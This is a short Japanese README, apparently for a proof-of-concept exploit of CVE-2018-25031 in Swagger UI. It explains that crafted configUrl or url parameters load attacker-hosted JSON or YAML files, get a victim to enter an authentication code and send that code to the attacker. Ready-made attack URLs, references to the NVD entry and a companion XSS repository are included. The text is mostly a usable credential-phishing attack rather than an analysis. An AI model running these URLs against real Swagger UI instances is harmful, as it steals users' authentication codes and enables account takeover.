
CVE-2018-25031(Swagger UI XSS)の概念実証エクスプロイト。細工されたconfigUrl/urlパラメータを介して認証コードを外部に漏えいさせます。
被害者に認証コードを入力させ、そのコードを攻撃者に送信するシンプルなPOC(CVE-2018-25031)です。
XSS脆弱性 https://github.com/VictorNS69/swagger-ui-xss と併用できます。
パラメータを見つけ、適切なファイルを指定する必要があります:configUrlにはJSONファイル、urlにはYAMLファイルを割り当てます。
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml
https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031